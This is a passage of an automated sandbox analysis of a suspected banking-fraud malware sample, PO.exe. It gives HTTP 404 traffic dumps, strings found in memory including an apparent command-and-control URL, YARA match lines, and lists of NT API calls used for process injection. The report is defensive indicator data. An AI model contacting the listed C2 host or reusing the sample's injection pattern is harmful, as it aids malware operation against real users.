20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 77 65 62 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 73 75 73 70 65 6e 64 65 64 2e 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 31 35 70 78 20 30 20 32 35 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:53:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:53:31 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:53:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:53:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003263592.0000000000D37000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.adjokctp.icu
                Source: vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003263592.0000000000D37000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.adjokctp.icu/wurw/
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: PO.exe, 00000000.00000002.1792334257.0000000005964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com(6
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 00000007.00000002.3002318934.0000000000621000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 00000007.00000002.3002318934.0000000000621000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 00000007.00000002.3002318934.0000000000621000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 00000007.00000002.3002318934.0000000000621000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033T
                Source: net.exe, 00000007.00000002.3002318934.0000000000621000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 00000007.00000002.3002318934.0000000000621000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 00000007.00000003.2470010190.0000000007813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3001987219.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3003697143.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2274480081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3003263592.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275144613.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3003792289.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3003894654.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2276815153.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0042C713 NtClose,2_2_0042C713
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732B60 NtClose,LdrInitializeThunk,2_2_01732B60
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01732DF0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01732C70
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017335C0 NtCreateMutant,LdrInitializeThunk,2_2_017335C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01734340 NtSetContextThread,2_2_01734340
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01734650 NtSuspendThread,2_2_01734650
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732BF0 NtAllocateVirtualMemory,2_2_01732BF0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732BE0 NtQueryValueKey,2_2_01732BE0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732BA0 NtEnumerateValueKey,2_2_01732BA0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732B80 NtQueryInformationFile,2_2_01732B80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732AF0 NtWriteFile,2_2_01732AF0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732AD0 NtReadFile,2_2_01732AD0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732AB0 NtWaitForSingleObject,2_2_01732AB0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732D30 NtUnmapViewOfSection,2_2_01732D30
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732D10 NtMapViewOfSection,2_2_01732D10
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732D00 NtSetInformationFile,2_2_01732D00
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732DD0 NtDelayExecution,2_2_01732DD0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732DB0 NtEnumerateKey,2_2_01732DB0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732C60 NtCreateKey,2_2_01732C60
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732C00 NtQueryInformationProcess,2_2_01732C00
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732CF0 NtOpenProcess,2_2_01732CF0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732CC0 NtQueryVirtualMemory,2_2_01732CC0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732CA0 NtQueryInformationToken,2_2_01732CA0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732F60 NtCreateProcessEx,2_2_01732F60
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732F30 NtCreateSection,2_2_01732F30
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732FE0 NtCreateFile,2_2_01732FE0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732FB0 NtResumeThread,2_2_01732FB0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732FA0 NtQuerySection,2_2_01732FA0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732F90 NtProtectVirtualMemory,2_2_01732F90
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732E30 NtWriteVirtualMemory,2_2_01732E30
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732EE0 NtQueueApcThread,2_2_01732EE0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732EA0 NtAdjustPrivilegesToken,2_2_01732EA0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732E80 NtReadVirtualMemory,2_2_01732E80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01733010 NtOpenDirectoryObject,2_2_01733010
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01733090 NtSetValueKey,2_2_01733090
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017339B0 NtGetContextThread,2_2_017339B0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01733D70 NtOpenThread,2_2_01733D70
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01733D10 NtOpenProcessToken,2_2_01733D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E94340 NtSetContextThread,LdrInitializeThunk,7_2_02E94340
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E94650 NtSuspendThread,LdrInitializeThunk,7_2_02E94650
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92AF0 NtWriteFile,LdrInitializeThunk,7_2_02E92AF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92AD0 NtReadFile,LdrInitializeThunk,7_2_02E92AD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02E92BE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02E92BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02E92BA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92B60 NtClose,LdrInitializeThunk,7_2_02E92B60
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02E92EE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02E92E80
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92FE0 NtCreateFile,LdrInitializeThunk,7_2_02E92FE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92FB0 NtResumeThread,LdrInitializeThunk,7_2_02E92FB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92F30 NtCreateSection,LdrInitializeThunk,7_2_02E92F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02E92CA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92C60 NtCreateKey,LdrInitializeThunk,7_2_02E92C60
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02E92C70
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02E92DF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92DD0 NtDelayExecution,LdrInitializeThunk,7_2_02E92DD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02E92D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02E92D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E935C0 NtCreateMutant,LdrInitializeThunk,7_2_02E935C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E939B0 NtGetContextThread,LdrInitializeThunk,7_2_02E939B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92AB0 NtWaitForSingleObject,7_2_02E92AB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92B80 NtQueryInformationFile,7_2_02E92B80
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92EA0 NtAdjustPrivilegesToken,7_2_02E92EA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92E30 NtWriteVirtualMemory,7_2_02E92E30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92FA0 NtQuerySection,7_2_02E92FA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92F90 NtProtectVirtualMemory,7_2_02E92F90
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92F60 NtCreateProcessEx,7_2_02E92F60
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92CF0 NtOpenProcess,7_2_02E92CF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92CC0 NtQueryVirtualMemory,7_2_02E92CC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92C00 NtQueryInformationProcess,7_2_02E92C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92DB0 NtEnumerateKey,7_2_02E92DB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E92D00 NtSetInformationFile,7_2_02E92D00
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E93090 NtSetValueKey,7_2_02E93090
